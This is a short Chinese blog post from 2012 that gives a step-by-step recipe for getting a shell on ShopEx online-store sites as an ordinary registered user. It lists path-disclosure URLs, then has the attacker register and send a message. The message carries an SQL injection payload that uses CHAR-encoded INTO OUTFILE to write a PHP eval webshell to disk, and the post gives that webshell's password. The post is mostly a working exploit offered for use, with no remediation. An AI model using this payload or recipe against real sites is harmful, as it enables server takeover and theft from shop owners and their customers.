shopex前台普通用户getshell最新漏洞

分类:安全 | 2012-10-8 | 撸过 82 次
0人扯谈

第一个:想办法找到目标网站的绝对路径

https://www.webshell.cc/install/svinfo.php?phpinfo=true
https://www.webshell.cc/core/api/shop_api.php
https://www.webshell.cc/core/api/site/2.0/api_b2b_2_0_cat.php
https://www.webshell.cc/core/api/site/2.0/api_b2b_2_0_goodstype.php
https://www.webshell.cc/core/api/site/2.0/api_b2b_2_0_brand.php
shopex存在很多爆路径的漏洞,请自行研究。
第二个:注册一个普通用户

https://www.webshell.cc/?passport-signup.html

第三个: 发送消息 

https://www.webshell.cc/?member-send.html

 

 

 

代码

 webshell.cc' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #

 

一句话的密码是#

这个漏洞,对于mysql用户权限有要求的,对于导出的目录也得有可写的要求,服务器环境也有要求。

shell图

本站内容均为原创,转载请务必保留署名与链接!
shopex前台普通用户getshell最新漏洞:https://www.webshell.cc/4050.html

随机日志